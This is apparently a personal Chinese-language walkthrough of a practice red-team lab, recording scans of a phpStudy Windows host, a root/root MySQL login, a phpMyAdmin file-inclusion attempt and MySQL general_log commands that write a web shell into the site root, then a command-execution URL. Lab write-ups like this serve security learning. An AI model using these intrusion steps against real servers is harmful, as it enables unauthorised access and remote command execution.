ATT&CK 1

wanwan

环境搭建

除了win7 改密码为 godrun@2019

信息收集

┌──(kali㉿kali)-[~]
└─$ nmap -sV -sT -sC -o nmapinitial 192.168.33.130
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-26 11:54 EDT
Nmap scan report for 192.168.33.130
Host is up (0.00056s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
3306/tcp open  mysql   MySQL (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.42 seconds

mysql 有个未授权

直接连没成功

┌──(kali㉿kali)-[~]
└─$ mysql -h 192.168.33.130 -P 3306 -u root              
ERROR 1130 (HY000): Host '192.168.33.133' is not allowed to connect to this MySQL server

先打80吧

扫一波目录

gobuster dir -u http://192.168.33.133/ -w /usr/share/wordlists/dirb/common.txt -t 100 

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.33.130/ -w /usr/share/wordlists/dirb/common.txt -t 100 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.33.130/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/26 12:10:36 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 213]
/.htaccess            (Status: 403) [Size: 218]
/.htpasswd            (Status: 403) [Size: 218]
/com2                 (Status: 403) [Size: 213]
/com1                 (Status: 403) [Size: 213]
/com3                 (Status: 403) [Size: 213]
/con                  (Status: 403) [Size: 212]
/lpt1                 (Status: 403) [Size: 213]
/lpt2                 (Status: 403) [Size: 213]
/nul                  (Status: 403) [Size: 212]
/phpmyadmin           (Status: 301) [Size: 241] [--> http://192.168.33.130/phpmyadmin/]
/phpMyAdmin           (Status: 301) [Size: 241] [--> http://192.168.33.130/phpMyAdmin/]
/prn                  (Status: 403) [Size: 212]                                        
/phpinfo.php          (Status: 200) [Size: 71392]                                      
/aux                  (Status: 403) [Size: 212]                                        
                                                                                       
===============================================================
2022/09/26 12:10:38 Finished
===============================================================

只有个 phpmyadmin 可以打

哦 对了 刚才试了 root root 可以连数据库

（可以切成中文 不是

拿到了后可以干什么

• 读敏感文件 密码之类
• 写shell？

oh 对了 我能不能改一下那个啥设置 然后我是不是就可以远程写文件了（但是我需要目录？

windows 的目录？~~~emmmm 很蓝的啦 ~~~ 忽略了 phpinfo.php

直接泄露了路径 C:\phpStudy\php\php-5.4.45\php.ini

写来试试

复习一下

读文件权限查询

show grants for 用户名@localhost;

文件大小小于max_allowed_packet（load_file()函数受到这个值的限制）

查看方法：mysql> show global variables like 'max_allowed%';
修改方法：mysql> set global max_allowed_packet = 5\*1024\*1024;

写文件权限查询

show global variables like "secure_file_priv";

(181条消息) MySQL 文件读写_iO快到碗里来的博客-CSDN博客_mysql 写文件

试着打个 phpmyadmin （failed

文件包含试一试 没成功 不知道为啥

?target=db_sql.php%253f/../../../tmp/sess_1v6hitp3cles3aps682pngiff1qvk1ef
?target=db_sql.php%253f/../../tmp/sess_1v6hitp3cles3aps682pngiff1qvk1ef

没成功，，，

可以看到 session 的路径

mysql 日志写文件

show global variables like "%genera%";

set global general_log='on'; 

SET global general_log_file='C:/phpStudy/WWW/shell.php';

SET global general_log_file='C:/phpStudy/WWW/shell.php';

set global general_log='off'; 

http://192.168.33.130/exp.php?cmd=system(%27whoami%27);

linux没有yijian 明天起来再搞 换个哥斯拉或者冰蝎试试